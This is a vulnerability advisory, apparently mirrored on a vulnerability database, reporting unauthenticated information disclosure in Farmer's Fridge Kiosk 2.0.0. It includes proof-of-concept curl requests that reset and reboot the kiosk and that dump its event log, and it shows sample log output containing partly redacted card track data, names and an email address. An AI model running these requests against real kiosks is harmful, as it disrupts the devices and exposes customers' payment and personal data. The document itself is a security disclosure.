Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Farmer's Fridge Kiosk 2.0.0 Information Disclosure

🗓️ 26 Mar 2017 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 51 Views

Farmer's Fridge Kiosk 2.0.0 Unprotected Event Log Information Disclosur

Code
`  
Farmer's Fridge Kiosk 2.0.0 Unprotected Event Log Information Disclosure  
  
  
Vendor: Farmer's Fridge  
Product web page: http://www.farmersfridge.com  
Affected version: 2.0.0  
  
Summary: Donat think of the Farmeras Fridge kiosk as a vending machine.  
Itas a veggie machine. And just as each salad is a culinary thing of  
beauty, the kiosk is a work of art in its own right. Made from reclaimed  
wood (provided by Modern Urban Woods of West Chicago) and even some  
recycled materials, each one is unique and user-friendly.  
  
Desc: The kiosk vending machine suffers from personally identifiable  
information (PII) disclosure vulnerability. By default, the firmware  
listens on port 9000/tcp as cslistener service using the Play Framework  
to present some basic information about the system when visiting the  
interface. The interface is accessed without any authentication system  
in place. When visited, some server information is disclosed by default  
and some XML pages for various config and supply information are disclosed,  
including the ability to reset or reboot the kiosk. One of those options  
is to show an 'event' type log history page containting various status  
of temperatures, supply count and transaction details. An attacker can  
increase the number for the 'days' GET parameter to disclose even more  
data back in history.  
  
When visiting the root page of the interface the following kiosk information  
is disclosed:  
  
Version: 2.0.0  
Server: PhysicalServer  
Config: {id=NAME_OF_COMPANY hostname=HOSTNAME location=STREET_ADDRESS, STATE, ZIP serialNumber=serial ip=REMOTE_ADDRESS_OF_KIOSK serialPort=ttyS1 isProd=true useMock=false messageQueue=/usr/share/kiosk-node/conf/queues planogramName=NAME_OF_COMPANY groups=List(KioskGroup(ALL)),route=None}  
Diagnostics: tools version VIPETL00, temp expiry disabled  
  
When visiting the events page information, the following log history is  
disclosed in plain-text:  
  
- Date, time and location of the transaction made  
- Authorization status on swipe  
- Credit card number + CVV  
- Name and surname on credit card  
- Personal e-mail account  
- What was bought and how much it costs  
  
  
Tested on: PhysicalServer  
nginx/1.6.2  
Ubuntu  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5399  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5399.php  
  
  
01.03.2017  
  
--  
  
  
PoC requests:  
  
Unauthorized/Unauthenticated DoS reset request:  
-----------------------------------------------  
  
- curl http://TARGET:9000/kiosk/reset  
  
  
Unauthorized/Unauthenticated DoS reboot request:  
------------------------------------------------  
  
- curl http://TARGET:9000/kiosk/reboot  
  
  
Unauthorized/Unauthenticated show event request and response:  
-------------------------------------------------------------  
  
- curl http://TARGET:9000/show/events\?days\=1337  
  
Sample response:  
  
COMPANY_NAME, 2017-03-25T12:05:11.183004301Z-0500[America/Chicago], Temperature, STATUS_FF_TEMP_OBSERVATION_OK, +37.4F  
COMPANY_NAME, 2017-03-25T12:00:11.173004300Z-0500[America/Chicago], Temperature, STATUS_FF_TEMP_OBSERVATION_OK, +37.4F  
COMPANY_NAME, 2017-03-25T11:55:11.207004299Z-0500[America/Chicago], Temperature, STATUS_FF_TEMP_OBSERVATION_OK, +40.1F  
COMPANY_NAME, 2017-03-25T11:50:11.184004298Z-0500[America/Chicago], Temperature, STATUS_FF_TEMP_OBSERVATION_OK, +40.1F  
COMPANY_NAME, 2017-03-25T15:50:09.839003295Z-0600[America/Chicago], AuthCaptureNeeded, 2017-03-25T15:49:51.256003292Z-0600[America/Chicago], 1.28, %B4147*REMOVED*4439^DOE/JOHN ^2010201000000000016081818901000?, ;4147*REMOVED*4439=201020116081818901?  
COMPANY_NAME, 2017-03-25T15:50:09.817003294Z-0600[America/Chicago], VendItem, STATUS_0_READY, LaCroix Lime, Drinks, 5, 1, 2, 2, 2017-03-25T15:49:51.288003293Z-0600[America/Chicago]  
COMPANY_NAME, 2017-03-25T15:49:51.288003293Z-0600[America/Chicago], VendTransaction, OK, 2017-03-25T15:49:51.256003292Z-0600[America/Chicago]  
COMPANY_NAME, 2017-03-25T15:49:51.256003292Z-0600[America/Chicago], Authorization, FAILED TO AUTHORIZE: no network + null, 2017-03-25T15:49:51.234003291Z-0600[America/Chicago], 1.28  
COMPANY_NAME, 2017-03-25T15:49:51.234003291Z-0600[America/Chicago], Swipe, OK, 2017-03-25T15:49:49.415003290Z-0600[America/Chicago], DOE/JOHN, 4439  
COMPANY_NAME, 2017-03-25T15:49:49.415003290Z-0600[America/Chicago], Checkout, 1.28  
COMPANY_NAME, 2017-03-25T14:54:40.745003289Z-0600[America/Chicago], Capture, STILL NEED TO CAPTURE: auth result was + FAILED TO AUTHORIZE: no network + null, 2017-03-25T14:54:22.213003286Z-0600[America/Chicago], 1.28  
COMPANY_NAME, 2017-03-24T08:56:43.591003488Z-0500[America/Chicago], Temperature, STATUS_FF_TEMP_OBSERVATION_OK, +39.2F  
COMPANY_NAME, 2017-03-24T08:55:52.256003487Z-0500[America/Chicago], Purchase, 2017-03-24T08:55:52.155003486Z-0500[America/Chicago], $8.00|1|North Napa Salad;$2.00|1|Seasoned Chicken;$6.00|1|Greek Yogurt Granola, DOE/JANE, JANEDOE@COMPANY_NAME.com, , 16.36, 0.36, 0.0, 0.0, 2575  
COMPANY_NAME, 2017-03-24T08:55:52.155003486Z-0500[America/Chicago], Capture, CAPTURED, 2017-03-24T08:54:53.269003482Z-0500[America/Chicago], 16.36  
COMPANY_NAME, 2017-03-24T08:55:51.113003485Z-0500[America/Chicago], VendItem, STATUS_0_READY, Greek Yogurt Granola, Snacks, 3, 3, 4, 6, 2017-03-24T08:54:53.269003482Z-0500[America/Chicago]  
COMPANY_NAME, 2017-03-24T08:55:30.335003484Z-0500[America/Chicago], VendItem, STATUS_0_READY, Seasoned Chicken, Proteins, 7, 0, 0, 0, 2017-03-24T08:54:53.269003482Z-0500[America/Chicago]  
COMPANY_NAME, 2017-03-24T08:55:14.056003483Z-0500[America/Chicago], VendItem, STATUS_0_READY, North Napa Salad, Salads, 1, 1, 6, 2, 2017-03-24T08:54:53.269003482Z-0500[America/Chicago]  
COMPANY_NAME, 2017-03-24T08:54:53.269003482Z-0500[America/Chicago], VendTransaction, OK, 2017-03-24T08:54:53.248003481Z-0500[America/Chicago]  
COMPANY_NAME, 2017-03-24T08:54:53.248003481Z-0500[America/Chicago], Authorization, AUTHORIZED, 2017-03-24T08:54:51.794003480Z-0500[America/Chicago], 16.36  
COMPANY_NAME, 2017-03-24T08:54:51.794003480Z-0500[America/Chicago], Swipe, OK, 2017-03-24T08:54:47.676003479Z-0500[America/Chicago], DOE/JANE, 2575  
COMPANY_NAME, 2017-03-24T08:54:47.676003479Z-0500[America/Chicago], Checkout, 16.36  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Mar 2017 00:00Current
7.4High risk
Vulners AI Score7.4
farmer's fridgeunprotected event loginformation disclosurevulnerabilityport 9000piiplay frameworkauthenticationserver informationxml pagesresetrebootunauthorizeddisclosurevulnerability discoveredadvisorydosphysicalservernginxubuntugjoko krsticzsl-2017-5399
51